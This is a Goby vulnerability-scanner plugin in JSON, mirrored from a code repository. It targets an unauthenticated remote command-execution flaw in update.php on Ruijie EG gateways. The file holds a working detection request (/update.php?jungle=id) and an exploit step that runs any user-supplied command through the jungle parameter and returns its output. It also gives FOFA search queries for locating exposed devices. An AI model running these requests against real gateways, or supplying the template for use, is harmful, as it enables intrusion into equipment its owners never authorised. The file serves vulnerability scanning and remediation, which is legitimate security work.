qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Ruijie-EG-update.php-RCE.json

151 lines
4.7 KiB
JSON
Raw Blame History

{
"Name": "Ruijie EG update.php RCE",
"Description": "<p>Ruijie EG Gateway is an efficient wireless gateway device.<br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.</span><br></p>",
"Product": "Ruijie EWEB",
"Homepage": "https://www.ruijie.com.cn/",
"DisclosureDate": "2022-03-23",
"Author": "abszse",
"FofaQuery": "body=\"EG易网关\"",
"GobyQuery": "body=\"EG易网关\"",
"Level": "3",
"Impact": "<p>There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.<br></p>",
"Recommendation": "<p>Authenticate the update.php file interface</p><p>Set up a whitelist to prevent malicious users</p><p>Pay attention to the official website update: <a href=\"https://www.ruijie.com.cn/\">https://www.ruijie.com.cn/</a></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "ls",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/update.php?jungle=id",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "gid=",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/update.php?jungle={{{cmd}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"Command Execution"
],
"VulType": [
"Command Execution"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "10",
"Translation": {
"CN": {
"Name": "锐捷 EG 易网关 update.php 文件命令执行漏洞",
"Product": "锐捷EG易网关",
"Description": "<p>锐捷EG易网关是一款高效的无线网关设备。<br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">锐捷EG易网关 update.php 文件存在安全漏洞,未授权用户可执行任意命令。</span><br></p>",
"Recommendation": "<p>对 update.php文件接口鉴权处理</p><p>设置白名单防止恶意用户</p><p>关注官网更新:<a href=\"https://www.ruijie.com.cn/\">https://www.ruijie.com.cn/</a></p>",
"Impact": "<p>锐捷EG易网关 update.php 文件存在安全漏洞,未授权用户可执行任意命令。<br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "Ruijie EG update.php RCE",
"Product": "Ruijie EWEB",
"Description": "<p>Ruijie EG Gateway is an efficient wireless gateway device.<br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.</span><br></p>",
"Recommendation": "<p>Authenticate the update.php file interface</p><p>Set up a whitelist to prevent malicious users</p><p>Pay attention to the official website update: <a href=\"https://www.ruijie.com.cn/\">https://www.ruijie.com.cn/</a></p>",
"Impact": "<p>There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.<br></p>",
"VulType": [
"Command Execution"
],
"Tags": [
"Command Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink